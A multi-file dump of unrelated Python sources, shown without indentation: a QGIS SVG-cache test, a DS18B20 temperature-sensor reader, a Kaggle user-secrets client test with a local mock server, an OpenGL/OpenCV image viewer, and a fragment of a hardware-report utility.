for p in sorted(hwmap, key=lambda i: i['platform']):
platform = p.get('platform')
connected = p.get('connected', False)
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.get('id', None), p.get('serial')])
print(tabulate(table, headers=header, tablefmt="github"))
def size_report(sc):
logger.info(sc.filename)
logger.info("SECTION NAME VMA LMA SIZE HEX SZ TYPE")
for i in range(len(sc.sections)):
v = sc.sections[i]
logger.info("%-17s 0x%08x 0x%08x %8d 0x%05x %-7s" %
(v["name"], v["virt_addr"], v["load_addr"], v["size"], v["size"],
v["type"]))
logger.info("Totals: %d bytes (ROM), %d bytes (RAM)" %
(sc.rom_size, sc.ram_size))
logger.info("")
def export_tests(filename, tests):
with open(filename, "wt") as csvfile:
fieldnames = ['section', 'subsection', 'title', 'reference']
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
for test in tests:
data = test.split(".")
if len(data) > 1:
subsec = " ".join(data[1].split("_")).title()
rowdict = {
"section": data[0].capitalize(),
"subsection": subsec,
"title": test,
"reference": test
}
cw.writerow(rowdict)
else:
logger.info("{} can't be exported".format(test))
|
test_qgssvgcache.py
|
# -*- coding: utf-8 -*-
"""QGIS Unit tests for QgsSvgCache.
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = '(C) 2018 by Nyall Dawson'
__date__ = '29/03/2018'
__copyright__ = 'Copyright 2018, The QGIS Project'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '176c06ceefb5f555205e72b20c962740cc0ec183'
import qgis # NOQA
import os
import socketserver
import threading
import http.server
from qgis.PyQt.QtCore import QDir, QCoreApplication
from qgis.PyQt.QtGui import QColor, QImage, QPainter
from qgis.core import (QgsSvgCache, QgsRenderChecker, QgsApplication, QgsMultiRenderChecker)
from qgis.testing import start_app, unittest
from utilities import unitTestDataPath
start_app()
TEST_DATA_DIR = unitTestDataPath()
class TestQgsSvgCache(unittest.TestCase):
@classmethod
def setUpClass(cls):
# Bring up a simple HTTP server, for remote SVG tests
os.chdir(unitTestDataPath() + '')
handler = http.server.SimpleHTTPRequestHandler
cls.httpd = socketserver.TCPServer(('localhost', 0), handler)
cls.port = cls.httpd.server_address[1]
cls.httpd_thread = threading.Thread(target=cls.httpd.serve_forever)
cls.httpd_thread.setDaemon(True)
cls.httpd_thread.start()
def setUp(self):
self.report = "<h1>Python QgsSvgCache Tests</h1>\n"
self.fetched = True
QgsApplication.svgCache().remoteSvgFetched.connect(self.svgFetched)
def tearDown(self):
report_file_path = "%s/qgistest.html" % QDir.tempPath()
with open(report_file_path, 'a') as report_file:
report_file.write(self.report)
def svgFetched(self):
self.fetched = True
def waitForFetch(self):
self.fetched = False
while not self.fetched:
QCoreApplication.processEvents()
def testRemoteSVG(self):
"""Test fetching remote svg."""
url = 'http://localhost:{}/qgis_local_server/sample_svg.svg'.format(str(TestQgsSvgCache.port))
image, in_cache = QgsApplication.svgCache().svgAsImage(url, 100, fill=QColor(0, 0, 0), stroke=QColor(0, 0, 0),
strokeWidth=0.1, widthScaleFactor=1)
# first should be waiting image
self.assertTrue(self.imageCheck('Remote SVG', 'waiting_svg', image))
self.waitForFetch()
# second should be correct image
image, in_cache = QgsApplication.svgCache().svgAsImage(url, 100, fill=QColor(0, 0, 0), stroke=QColor(0, 0, 0),
strokeWidth=0.1, widthScaleFactor=1)
self.assertTrue(self.imageCheck('Remote SVG', 'remote_svg', image))
def testRemoteSvgAsText(self):
"""Test fetching remote svg with text mime format - e.g. github raw svgs"""
url = 'http://localhost:{}/qgis_local_server/svg_as_text.txt'.format(str(TestQgsSvgCache.port))
image, in_cache = QgsApplication.svgCache().svgAsImage(url, 100, fill=QColor(0, 0, 0), stroke=QColor(0, 0, 0),
strokeWidth=0.1, widthScaleFactor=1)
# first should be waiting image
self.assertTrue(self.imageCheck('Remote SVG as Text', 'waiting_svg', image))
self.waitForFetch()
# second should be correct image
image, in_cache = QgsApplication.svgCache().svgAsImage(url, 100, fill=QColor(0, 0, 0), stroke=QColor(0, 0, 0),
strokeWidth=0.1, widthScaleFactor=1)
# first should be waiting image
self.assertTrue(self.imageCheck('Remote SVG as Text', 'remote_svg', image))
def testRemoteSvgBadMime(self):
"""Test fetching remote svg with bad mime type"""
url = 'http://localhost:{}/qgis_local_server/logo.png'.format(str(TestQgsSvgCache.port))
image, in_cache = QgsApplication.svgCache().svgAsImage(url, 100, fill=QColor(0, 0, 0), stroke=QColor(0, 0, 0),
strokeWidth=0.1, widthScaleFactor=1)
# first should be waiting image
self.assertTrue(self.imageCheck('Remote SVG bad MIME type', 'waiting_svg', image))
# second should be correct image
self.waitForFetch()
image, in_cache = QgsApplication.svgCache().svgAsImage(url, 100, fill=QColor(0, 0, 0), stroke=QColor(0, 0, 0),
strokeWidth=0.1, widthScaleFactor=1)
self.assertTrue(self.imageCheck('Remote SVG bad MIME type', 'bad_svg', image))
def testRemoteSvgMissing(self):
"""Test fetching remote svg with bad url"""
url = 'http://localhost:{}/qgis_local_server/xxx.svg'.format(str(TestQgsSvgCache.port)) # oooo naughty
image, in_cache = QgsApplication.svgCache().svgAsImage(url, 100, fill=QColor(0, 0, 0), stroke=QColor(0, 0, 0),
strokeWidth=0.1, widthScaleFactor=1)
self.assertTrue(self.imageCheck('Remote SVG missing', 'waiting_svg', image))
def imageCheck(self, name, reference_image, image):
self.report += "<h2>Render {}</h2>\n".format(name)
temp_dir = QDir.tempPath() + '/'
file_name = temp_dir + 'svg_' + name + ".png"
output_image = QImage(image.size(), QImage.Format_RGB32)
QgsMultiRenderChecker.drawBackground(output_image)
painter = QPainter(output_image)
painter.drawImage(0, 0, image)
painter.end()
output_image.save(file_name, "PNG")
checker = QgsRenderChecker()
checker.setControlPathPrefix("svg_cache")
checker.setControlName("expected_" + reference_image)
checker.setRenderedImage(file_name)
checker.setColorTolerance(2)
result = checker.compareImages(name, 20)
self.report += checker.report()
print((self.report))
return result
if __name__ == '__main__':
unittest.main()
|
ds18b20.py
|
# -*- coding: utf-8 -*-
"""
Main module for DS18B2 sensors.
"""
import os
import time
import sys
import logging
import exports
import collections
from threading import Thread, Lock, Event
"""
Private classes / functions
"""
class _SensorDictionary(object):
def __init__(self, sensors):
"""Private class *_SensorDictionary* provides functions to manage the
sensors dictionary.
:param sensors:
Expects a list containing sensors as strings.
:return:
Returns a in-memory object tree providing the functions
*set_temp*, *get_dic* and *reset_dic*.
"""
dic = dict()
for sensor in sensors:
dic[sensor] = None
self.dic = collections.OrderedDict(sorted(dic.items()))
self.lock = Lock()
def set_temp(self, sensor, temp):
"""Public function *set_temp* sets the value for an individual key.
:param sensor:
Expects a string of the sensor name to match with the sensor key.
:param temp:
Expects an integer or a float containing the sensor value
to store.
:return:
Returns *None*.
"""
with self.lock:
self.dic.__setitem__(sensor, temp)
def get_dic(self):
"""Public function *get_dic* returns the sensors dictionary.
:return:
Returns the dictionary.
"""
return self.dic
def reset_dic(self):
"""Public function *reset_dic* sets all dictionary values to None.
:return:
Returns *None*.
"""
for sensor in self.dic.keys():
self.dic.__setitem__(sensor, None)
"""
Public classes / functions
"""
class Check(object):
def __init__(self, logger=None):
"""Public class *Check* provides functions to validate system
configuration enabling DS18B20 sensors.
:param logger:
Expects a logger object of the standard library module *logging*.
If *logger=None*, an own logger object of the standard
library module *logging* is added to handle outputs.
:return:
Returns an object providing the public functions *w1_config* and
*w1_modules*.
"""
# validating the passed parameter *logger*
if logger is None:
log_format = '%(asctime)s %(name)-8s %(levelname)-8s %(message)s'
log_date_format = '%Y-%m-%d %H:%M:%S'
logging.basicConfig(level=logging.INFO,
format=log_format,
datefmt=log_date_format)
self.logger = self.logger = logging.getLogger('eems')
else:
self.logger = logger
self.dir_modules = '/etc/modules'
self.dir_config = '/boot/config.txt'
self.flag = {'w1-therm': False,
'w1-gpio': False}
def w1_config(self, quiet=None):
"""Public function *w1_config* checks the config.txt file for the
entry *dtoverlay=w1-gpio*.
:param quiet:
Expects the boolean *True* or *None*. If *quiet=True*, all outputs
of the function *w1_config* are disabled.
:return:
Returns *True* if check passed. Otherwise *False*.
"""
if quiet is True:
self.logger.disabled = True
try:
with open(self.dir_config, 'r') as config_file:
config = config_file.readlines()
except IOError as e:
self.logger.error('{}'.format(e))
else:
check = [c for c in config if c.strip('\n')[:17] ==
'dtoverlay=w1-gpio']
if len(check) == 0:
self.logger.error('Config.txt check failed: "dtoverlay=w1-gpio"'
' is not set')
self.logger.info('Please use the command script <sudo eems '
'prepare> to prepare "/boot/config.txt"')
return False
else:
self.logger.info('Config.txt check ok: "dtoverlay=w1-gpio" '
'is set')
return True
def w1_modules(self, quiet=None):
"""Public function *w1_modules* checks the file */etc/modules* for the
entries *w1-therm* and *w1-gpio*.
:param quiet:
Expects the boolean *True* or *None*. If *quiet=True*, all outputs
of the function *w1_modules* are disabled.
:return:
Returns *True* if check passed. Otherwise returns *False*.
"""
if quiet is True:
self.logger.disabled = True
try:
with open(self.dir_modules, 'r') as modules_file:
modules = modules_file.readlines()
except IOError as e:
self.logger.error('{}'.format(e))
else:
check_therm = [c for c in modules if c.strip('\n') == 'w1-therm']
check_gpio = [c for c in modules if c.strip('\n') == 'w1-gpio']
if len(check_therm) == 1:
self.logger.info('Module check ok: "w1-therm" is set')
self.flag['w1-therm'] = True
else:
self.logger.error('Module check failed: "w1-therm" is not set')
if len(check_gpio) == 1:
self.logger.info('Module check ok: "w1-gpio" is set')
self.flag['w1-gpio'] = True
else:
self.logger.error('Module check failed: "w1-gpio" is not set')
if self.flag['w1-therm'] is True and self.flag['w1-gpio'] is True:
return True
else:
self.logger.info('Please use the command script <sudo eems '
'prepare> to prepare "/etc/modules"')
return False
def prepare(self):
"""Public function *prepare* modifies the files */boot/config.txt* and
*/etc/modules* to enable DS18B20 functionality. Function requires *sudo*
rights!!!
:return:
Returns *None*.
"""
if self.w1_config(quiet=True) is False:
self.logger.disabled = False
try:
with open(self.dir_config, 'a') as config_file:
config_file.write('dtoverlay=w1-gpio\n')
except IOError as e:
self.logger.error('{}'.format(e))
else:
self.logger.info('Config.txt has been prepared successfully')
else:
self.logger.disabled = False
if self.w1_modules(quiet=True) is False:
self.logger.disabled = False
try:
if self.flag['w1-therm'] is False:
with open(self.dir_modules, 'a') as modules_file:
modules_file.write('w1-therm\n')
if self.flag['w1-gpio'] is False:
with open(self.dir_modules, 'a') as modules_file:
modules_file.write('w1-gpio\n')
except IOError as e:
self.logger.error('{}'.format(e))
else:
self.logger.info('Modules have been prepared successfully')
else:
self.logger.disabled = False
class Temp(object):
def __init__(self, csv=None, log=None, console=None):
"""Public Class *Temp* detects connected DS18B20 one-wire sensors
and provides functions to read the sensors. This class uses the
standard library module *logging* for handling outputs.
:param csv:
Expects the boolean *True* or *None*. If *csv=True*, a csv file is
created in the same directory as this script. Afterwards all public
functions of this object write entries into the csv file after
been called.
:param log:
Expects the boolean *True* or *None*. If *log=True*, a .txt logfile
is created in the same directory as this script. Therefore, all
outputs of the *level=DEBUG* are written into the log file.
:param console:
Expects the boolean *True* or *None*. If *console=True*, outputs
of the *level=INFO* are passed to the console.
:return:
Returns an object providing the public functions *read* and
*monitor*.
"""
if os.path.basename(sys.argv[0])[-3:] == '.py':
self.filename_script = os.path.basename(sys.argv[0])[:-3]
else:
self.filename_script = 'eems'
self.str_date = time.strftime('%Y-%m-%d')
self.str_time = time.strftime('%H-%M-%S')
self.event = Event()
self.read_flag = Event()
self.flag = False
self.stop = False
log_format = '%(asctime)s %(name)-8s %(levelname)-8s %(message)s'
log_date_format = '%Y-%m-%d %H:%M:%S'
if log is True:
log_file = '{0}_{1}_{2}.txt'.format(self.str_date,
self.str_time,
self.filename_script)
logging.basicConfig(level=logging.DEBUG,
format=log_format,
datefmt=log_date_format,
filename=log_file)
if console is True:
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = logging.Formatter(fmt=log_format,
datefmt=log_date_format)
console.setFormatter(formatter)
logging.getLogger('').addHandler(console)
self.logger = logging.getLogger('eems')
else:
self.logger = logging.getLogger('eems')
else:
logging.basicConfig(level=logging.INFO,
format=log_format,
datefmt=log_date_format)
if console is True:
self.logger = logging.getLogger('eems')
else:
self.logger = logging.getLogger('eems')
self.logger.disabled = True
if log is True:
self.logger.debug('Logfile has been created')
else:
self.logger.debug('No logfile has been created')
pid = os.getpid()
self.logger.debug('Process PID: {0}'.format(pid))
sensors = self.__detect_sensors()
if sensors is False:
sys.exit()
else:
self.sensor_dict = _SensorDictionary(sensors)
if csv is True:
csv_file = '{0}_{1}_{2}.csv'.format(self.str_date,
self.str_time,
self.filename_script)
dic = self.sensor_dict.get_dic()
self.CsvHandler = exports.CsvHandler(csv_file,
dic.keys(),
self.logger)
self.csv = True
else:
self.csv = None
def __detect_sensors(self):
"""Private function *__detect_sensors* detects all connected DS18B20
sensors.
:return:
If sensors are detected successfully, a list containing all
connected sensors is returned. Otherwise *None* is returned.
"""
dir_sensors = '/sys/bus/w1/devices'
if os.path.exists(dir_sensors):
list_sensors = [fn for fn in os.listdir(dir_sensors)
if fn.startswith('28')]
if len(list_sensors) != 0:
self.logger.info('Sensors detected: {0}'.format(
len(list_sensors)))
return list_sensors
else:
self.logger.error('No sensors detected')
else:
self.logger.error('Path "/sys/bus/w1/devices" does not exist')
def __read_slave(self, sensor):
"""Private function *__read_slave* reads the file *w1_slave* of a
connected DS18B20 sensor.
:param sensor:
Expects a string containing the name of a connected DS18B20 sensor.
:return:
Returns *None*.
"""
dir_file = '/sys/bus/w1/devices/' + sensor
for x in range(4):
try:
with open(dir_file + '/w1_slave', 'r') as slave:
file_content = slave.readlines()
except IOError as e:
self.logger.error('{}'.format(e))
else:
if x == 3:
self.logger.warning('Sensor: {0} - read failed '
'(Wrong CRC?)'.format(sensor))
self.sensor_dict.set_temp(sensor, 'n/a')
elif file_content[0].strip()[-3:] == 'YES':
value = file_content[1].strip()[29:]
t = round(float(value) / 1000, 2)
self.sensor_dict.set_temp(sensor, t)
self.logger.info('Sensor: {0} - read successful - '
'{1}°C'.format(sensor, t))
break
else:
time.sleep(0.2)
def __read_sensors(self):
"""Private function *__read_sensors* reads all connected DS18B20 sensors
by initializing parallel threads. Function waits until all sensors
are read.
:return:
Returns *None*.
"""
self.read_flag.clear()
threads = []
dic = self.sensor_dict.get_dic()
for sensor in dic.keys():
threads.append(Thread(target=self.__read_slave,
args=(sensor, )))
for t in threads:
t.setDaemon(True)
t.start()
for t in threads:
t.join()
self.read_flag.set()
def read(self, *args, **kwargs):
"""Public function *read* reads all connected DS18B20 sensors once.
:return:
Returns a dictionary containing sensor names as keys and
sensor values as values.
"""
del args, kwargs
if self.csv is None:
self.sensor_dict.reset_dic()
self.__read_sensors()
return self.sensor_dict.get_dic()
else:
self.sensor_dict.reset_dic()
self.__read_sensors()
result = self.sensor_dict.get_dic()
self.CsvHandler.write(result.values())
return result
def monitor(self, interval=60, duration=None):
"""Public function *monitor* starts a thread to read connected
DS18B20 sensors within an interval over a duration.
:param interval:
Expects an integer containing the interval time in seconds. The
default interval is set to 60 seconds.
:param duration:
Expects an integer containing the duration time in seconds. If
*duration=None*, the duration is infinite and the thread needs to
be stopped manually by pressing Ctrl+C.
:return:
Returns *None*.
"""
if self.flag is False:
if interval < 2:
self.logger.error('Interval must be >= 2s')
sys.exit()
worker = Thread(target=self.__start_read, args=(interval,))
self.logger.debug('Thread monitor was added')
if duration is None:
pass
else:
if duration > interval:
watchdog = Thread(target=self.__watchdog,
args=(duration, interval))
watchdog.setDaemon(True)
self.logger.debug('Watchdog_one has started with a duration'
' of {0}s'.format(duration))
watchdog.start()
else:
self.logger.error('Duration must be longer than the '
'interval')
sys.exit()
worker.start()
self.flag = True
self.logger.debug('Thread monitor has started with an '
'interval of {1}s'.format(worker, interval))
try:
while self.stop is False:
time.sleep(0.25)
except KeyboardInterrupt:
self.read_flag.wait()
self.__stop(trigger='keyboard')
else:
self.logger.warning('Already one read thread is running, '
'start of a second thread was stopped')
def __watchdog(self, duration, interval):
"""Private function *__watchdog* handles stopping of the function
*monitor* if a used defined duration was passed.
:param duration:
Expects an integer containing the duration in seconds.
:param interval:
Expects an integer containing the interval in seconds.
:return:
Returns *None*.
"""
timestamp = int(time.time() / interval) * interval
timestamp += interval
t = timestamp - time.time()
time.sleep(duration + t)
self.read_flag.wait()
self.__stop(trigger='watchdog')
def __start_read(self, interval):
"""Private function *__start_read* manages the loop in which the
function *__read_sensors* is called.
:param interval:
Expects an integer containing the interval in seconds.
:return:
Returns *None*.
"""
timestamp = int(time.time() / interval) * interval
timestamp += interval
self.event.clear()
while not self.event.wait(max(0, timestamp - time.time())):
if self.csv is None:
self.sensor_dict.reset_dic()
self.__read_sensors()
else:
self.sensor_dict.reset_dic()
self.__read_sensors()
result = self.sensor_dict.get_dic()
self.CsvHandler.write(result.values())
timestamp += interval
def __stop(self, trigger):
"""Private function *__stop* stops the thread started by calling
the function *monitor*
:param trigger:
Expects a string. Either *watchdog* or *keyboard* to trigger
varying info messages.
:return:
Returns *None*.
"""
message = ''
if self.event.is_set() is False:
self.event.set()
if trigger == 'watchdog':
message = 'Monitor has been stopped due to expiring duration'
elif trigger == 'keyboard':
message = 'Monitor has been stopped manually by ' \
'pressing Ctrl-C'
self.logger.debug(message)
self.flag = False
self.stop = True
else:
self.logger.warning('No monitor function to stop ...')
|
test_user_secrets.py
|
import json
import os
import threading
import unittest
from http.server import BaseHTTPRequestHandler, HTTPServer
from test.support import EnvironmentVarGuard
from urllib.parse import urlparse
from datetime import datetime, timedelta
import mock
from google.auth.exceptions import DefaultCredentialsError
from google.cloud import bigquery
from kaggle_secrets import (GcpTarget, UserSecretsClient,
NotFoundError, ValidationError)
from kaggle_web_client import (_KAGGLE_URL_BASE_ENV_VAR_NAME,
_KAGGLE_USER_SECRETS_TOKEN_ENV_VAR_NAME,
CredentialError, BackendError)
_TEST_JWT = 'test-secrets-key'
class UserSecretsHTTPHandler(BaseHTTPRequestHandler):
def set_request(self):
raise NotImplementedError()
def get_response(self):
raise NotImplementedError()
def do_HEAD(s):
s.send_response(200)
def do_POST(s):
s.set_request()
s.send_response(200)
s.send_header("Content-type", "application/json")
s.end_headers()
s.wfile.write(json.dumps(s.get_response()).encode("utf-8"))
class TestUserSecrets(unittest.TestCase):
SERVER_ADDRESS = urlparse(os.getenv(_KAGGLE_URL_BASE_ENV_VAR_NAME, default="http://127.0.0.1:8001"))
def _test_client(self, client_func, expected_path, expected_body, secret=None, success=True):
_request = {}
class AccessTokenHandler(UserSecretsHTTPHandler):
def set_request(self):
_request['path'] = self.path
content_len = int(self.headers.get('Content-Length'))
_request['body'] = json.loads(self.rfile.read(content_len))
_request['headers'] = self.headers
def get_response(self):
if success:
return {'result': {'secret': secret, 'secretType': 'refreshToken', 'secretProvider': 'google', 'expiresInSeconds': 3600}, 'wasSuccessful': "true"}
else:
return {'wasSuccessful': "false", 'errors': ['No user secrets exist for kernel']}
env = EnvironmentVarGuard()
env.set(_KAGGLE_USER_SECRETS_TOKEN_ENV_VAR_NAME, _TEST_JWT)
with env:
with HTTPServer((self.SERVER_ADDRESS.hostname, self.SERVER_ADDRESS.port), AccessTokenHandler) as httpd:
threading.Thread(target=httpd.serve_forever).start()
try:
client_func()
finally:
httpd.shutdown()
path, headers, body = _request['path'], _request['headers'], _request['body']
self.assertEqual(
path,
expected_path,
msg="Fake server did not receive the right request from the UserSecrets client.")
self.assertEqual(
body,
expected_body,
msg="Fake server did not receive the right body from the UserSecrets client.")
def test_no_token_fails(self):
env = EnvironmentVarGuard()
env.unset(_KAGGLE_USER_SECRETS_TOKEN_ENV_VAR_NAME)
with env:
with self.assertRaises(CredentialError):
client = UserSecretsClient()
def test_get_secret_succeeds(self):
secret = '12345'
def call_get_secret():
client = UserSecretsClient()
secret_response = client.get_secret("secret_label")
self.assertEqual(secret_response, secret)
self._test_client(call_get_secret,
'/requests/GetUserSecretByLabelRequest', {'Label': "secret_label"},
secret=secret)
def test_get_secret_handles_unsuccessful(self):
def call_get_secret():
client = UserSecretsClient()
with self.assertRaises(BackendError):
secret_response = client.get_secret("secret_label")
self._test_client(call_get_secret,
'/requests/GetUserSecretByLabelRequest', {'Label': "secret_label"},
success=False)
def test_get_secret_validates_label(self):
env = EnvironmentVarGuard()
env.set(_KAGGLE_USER_SECRETS_TOKEN_ENV_VAR_NAME, _TEST_JWT)
with env:
client = UserSecretsClient()
with self.assertRaises(ValidationError):
secret_response = client.get_secret("")
def test_get_gcloud_secret_succeeds(self):
secret = '{"client_id":"gcloud","type":"authorized_user"}'
def call_get_secret():
client = UserSecretsClient()
secret_response = client.get_gcloud_credential()
self.assertEqual(secret_response, secret)
self._test_client(call_get_secret,
'/requests/GetUserSecretByLabelRequest', {'Label': "__gcloud_sdk_auth__"},
secret=secret)
def test_get_gcloud_secret_handles_unsuccessful(self):
def call_get_secret():
client = UserSecretsClient()
with self.assertRaises(NotFoundError):
secret_response = client.get_gcloud_credential()
self._test_client(call_get_secret,
'/requests/GetUserSecretByLabelRequest', {'Label': "__gcloud_sdk_auth__"},
success=False)
@mock.patch('kaggle_secrets.datetime')
def test_get_access_token_succeeds(self, mock_dt):
secret = '12345'
now = datetime(1993, 4, 24)
mock_dt.utcnow = mock.Mock(return_value=now)
def call_get_bigquery_access_token():
client = UserSecretsClient()
secret_response = client.get_bigquery_access_token()
self.assertEqual(secret_response, (secret, now + timedelta(seconds=3600)))
def call_get_gcs_access_token():
client = UserSecretsClient()
secret_response = client._get_gcs_access_token()
self.assertEqual(secret_response, (secret, now + timedelta(seconds=3600)))
self._test_client(call_get_bigquery_access_token,
'/requests/GetUserSecretRequest', {'Target': GcpTarget.BIGQUERY.target},
secret=secret)
self._test_client(call_get_gcs_access_token,
'/requests/GetUserSecretRequest', {'Target': GcpTarget.GCS.target},
secret=secret)
def test_get_access_token_handles_unsuccessful(self):
def call_get_access_token():
client = UserSecretsClient()
with self.assertRaises(BackendError):
client.get_bigquery_access_token()
self._test_client(call_get_access_token,
'/requests/GetUserSecretRequest', {'Target': GcpTarget.BIGQUERY.target}, success=False)
|
pyglview.py
|
#!/usr/bin/env python3
import logging
import os
import signal
import sys
import threading
import time
import numpy as np
from easydict import EasyDict as edict
try:
from OpenGL.GL import *
from OpenGL.GLU import *
from OpenGL.GLUT import *
import OpenGL.GLUT
AVAILABLE_OPENGL = True
except Exception as e:
print(e)
print("Error: Does not exist OpenGL library")
print(" > sudo apt install -y libxmu-dev libxi-dev # install before GPU driver")
print(" > pip3 install PyOpenGL PyOpenGL-accelerate")
AVAILABLE_OPENGL = False
logger = logging.getLogger(__name__)
def to_bool(s):
return s in [1, 'True', 'TRUE', 'true', '1', 'yes', 'Yes', 'Y', 'y', 't']
def handler(signum, frame):
exit(0)
signal.signal(signal.SIGINT, handler)
config = edict()
config.viewer = edict({"window_name": "Screen", "vsync": False, "double_buffer": False, "rgba_buffer": False, "fullscreen": False, "window_x": 100, "window_y": 100, "window_width": 1280, "window_height": 720, "cpu": False})
def get_config():
return {section: dict(config[section]) for section in config.sections()}
class Viewer:
def init(self, kargs):
for k in kargs:
setattr(self, k, kargs[k])
def s_bool(s, k):
setattr(s, k, to_bool(getattr(s, k)))
def s_int(s, k):
setattr(s, k, int(getattr(s, k)))
s_bool(self, "vsync")
s_bool(self, "double_buffer")
s_bool(self, "rgba_buffer")
s_bool(self, "fullscreen")
s_int(self, "window_x")
s_int(self, "window_y")
s_int(self, "window_width")
s_int(self, "window_height")
s_bool(self, "cpu")
logger.debug(f"Window:{self.window_width}")
def __init__(self, **kargs):
global config
self.keyboard_listener = None
self.cnt = 0
self.tm = 0
self.cnt2 = 0
self.image_buffer = None
self.destructor_function = None
self.idle_function = None
self.previous_time = time.time()
cv = config.viewer
for k in cv:
setattr(self, k, cv[k])
self.init(kargs)
def set_window_name(self, name):
self.window_name = name
def set_image(self, img):
self.image_buffer = img
def set_loop(self, func):
self.idle_function = func
def set_destructor(self, func):
self.destructor_function = func
def enable_fullscreen(self):
self.fullscreen = True
def disable_fullscreen(self):
self.fullscreen = True
def enable_vsync(self):
if "darwin" in sys.platform:
return
try:
import ctypes
import ctypes.util
ogl = ctypes.cdll.LoadLibrary(ctypes.util.find_library("OpenGL"))
v = ctypes.c_int(1)
ogl.CGLGetCurrentContext.argtypes = []
ogl.CGLGetCurrentContext.restype = ctypes.c_void_p
ogl.CGLSetParameter.argtypes = [ctypes.c_void_p, ctypes.c_int, ctypes.c_void_p]
ogl.CGLSetParameter.restype = ctypes.c_int
context = ogl.CGLGetCurrentContext()
ogl.CGLSetParameter(context, 222, ctypes.pointer(v))
logger.debug("Enabled vsync")
except Exception as e:
logger.warning("Unable to set vsync mode, using driver defaults: {}".format(e))
def start(self, **kargs):
global AVAILABLE_OPENGL
self.init(kargs)
window_type = "offscreen"
if "linux" in sys.platform:
if 'DISPLAY' in os.environ:
logger.debug(f"DISPLAY: {os.environ['DISPLAY']}")
if os.environ['DISPLAY'] == ':0':
window_type = "primary"
else:
AVAILABLE_OPENGL = False
window_type = "virtual"
else:
AVAILABLE_OPENGL = False
else:
window_type = "primary"
logger.debug(f"WindowType: {window_type}")
logger.debug(f"Available OpenGL: {AVAILABLE_OPENGL}")
logger.debug(f"GPU: {self.cpu is False}")
if self.cpu is False and AVAILABLE_OPENGL:
logger.info("")
logger.info("---- Use GPU directly ----")
logger.info("")
args = []
logger.debug(f"VSync: {self.vsync}")
if self.vsync:
args.append('-sync')
self.enable_vsync()
logger.debug(f"ARGS: {args}")
w = self.window_width
h = self.window_height
x = self.window_x
y = self.window_y
glutInit(args)
DB = GLUT_SINGLE
CL = GLUT_RGB
if self.double_buffer:
DB = GLUT_DOUBLE
logger.debug("Use double buffer")
else:
logger.debug("Use single buffer")
if self.rgba_buffer:
CL = GLUT_RGBA
logger.debug("Use rgba buffer")
else:
logger.debug("Use rgb buffer")
glutInitDisplayMode(CL | DB | GLUT_DEPTH)
glutInitWindowSize(w, h)
glutInitWindowPosition(x, y)
glutCreateWindow(self.window_name)
if self.fullscreen: glutFullScreen()
glutDisplayFunc(self.__gl_draw)
glutIdleFunc(self.__gl_draw)
glutReshapeFunc(self.__gl_resize)
glutKeyboardFunc(self.__gl_keyboard)
glutSpecialFunc(self.__gl_keyboard)
glClearColor(0.0, 0.0, 0.0, 1.0)
glEnable(GL_DEPTH_TEST)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glOrtho(-1, 1, -1, 1, -1, 1)
glutMainLoop()
else:
if window_type == "offscreen":
#import cv2
import imgcat
import queue
import multiprocessing
def iterm2_renderer(q):
while True:
img = q.get()
print("\033[0;0f")
imgcat.imgcat(img)
if True:
q = multiprocessing.Queue()
th = multiprocessing.Process(target=iterm2_renderer, args=(q, ), daemon=True)
th.start()
else:
q = queue.Queue()
th = threading.Thread(target=iterm2_renderer, args=(q, ))
th.setDaemon(True)
th.start()
logger.warning("@WARNING: No display.")
logger.warning("---- No display: iTerm2 renderer will be used ----")
while True:
if self.idle_function is not None:
try:
self.idle_function()
except Exception as e:
logger.error(e)
exit(9)
return
if self.image_buffer is not None:
try:
self.cnt += 1
#self.image_buffer = cv2.cvtColor(self.image_buffer,cv2.COLOR_BGR2RGB)
if time.time() - self.tm > 1.0:
#logger.info(f"\033[0KViewer[N/A]-FPS {self.cnt}\033[1A")
self.tm = time.time()
self.cnt = 0
if q.empty():
q.put(self.image_buffer)
#imgcat.imgcat(self.image_buffer)
time.sleep(0.008)
except Exception as e:
logger.error(e)
return
self.image_buffer = None
else:
time.sleep(0.008)
else:
import cv2
if self.cpu is False: logger.warning("@WARNING: GPU or physical display is not available.")
logger.warning("---- Use CPU(OpenCV) renderer ----")
buffer = np.zeros(shape=(self.window_height, self.window_width, 3), dtype=np.uint8)
if self.fullscreen:
cv2.namedWindow(self.window_name, cv2.WINDOW_NORMAL)
# cv2.namedWindow(self.window_name, cv2.WINDOW_OPENGL)
cv2.setWindowProperty(self.window_name, cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)
else:
cv2.namedWindow(self.window_name, cv2.WINDOW_AUTOSIZE | cv2.WINDOW_KEEPRATIO | cv2.WINDOW_GUI_NORMAL)
# cv2.namedWindow(self.window_name, cv2.WINDOW_NORMAL)
# pass
# cv2.namedWindow(self.window_name, cv2.WINDOW_GUI_NORMAL)
while True:
if self.idle_function is not None:
try:
self.idle_function()
except:
cv2.waitKey(1)
cv2.destroyAllWindows()
cv2.waitKey(1)
return
if self.image_buffer is not None:
try:
self.cnt += 1
self.image_buffer = cv2.cvtColor(self.image_buffer, cv2.COLOR_BGR2RGB)
buffer.fill(0)
w = self.window_width
h = self.window_height
iw = self.image_buffer.shape[1]
ih = self.image_buffer.shape[0]
img = self.image_buffer
r = w / h
ir = iw / ih
ratio = 1.0
if r > ir:
ratio = h / ih
img = cv2.resize(img, (int(img.shape[1] * ratio), int(img.shape[0] * ratio)))
hlf = int((w - img.shape[1]) / 2)
buffer[0:img.shape[0], hlf:img.shape[1] + hlf, ] = img
else:
ratio = w / iw
img = cv2.resize(img, (int(img.shape[1] * ratio), int(img.shape[0] * ratio)))
hlf = int((h - img.shape[0]) / 2)
buffer[hlf:img.shape[0] + hlf, 0:img.shape[1], ] = img
if time.time() - self.tm > 1.0:
logger.info(f"\033[0KViewer[CV2]-FPS {self.cnt}\033[1A")
self.tm = time.time()
self.cnt = 0
if self.fullscreen:
cv2.imshow(self.window_name, self.image_buffer)
else:
cv2.imshow(self.window_name, buffer)
if cv2.waitKey(8) & 0xFF == 27:
cv2.waitKey(1)
cv2.destroyAllWindows()
cv2.waitKey(1)
return
except Exception as e:
logger.warning(e)
cv2.waitKey(1)
